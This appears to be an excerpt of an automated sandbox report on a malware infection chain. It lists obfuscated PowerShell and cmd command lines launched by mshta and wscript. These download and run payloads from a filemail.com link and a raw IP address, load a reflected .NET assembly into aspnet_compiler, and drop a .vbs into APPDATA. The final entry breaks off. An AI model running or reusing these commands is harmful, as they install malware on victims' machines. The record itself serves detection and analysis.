        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2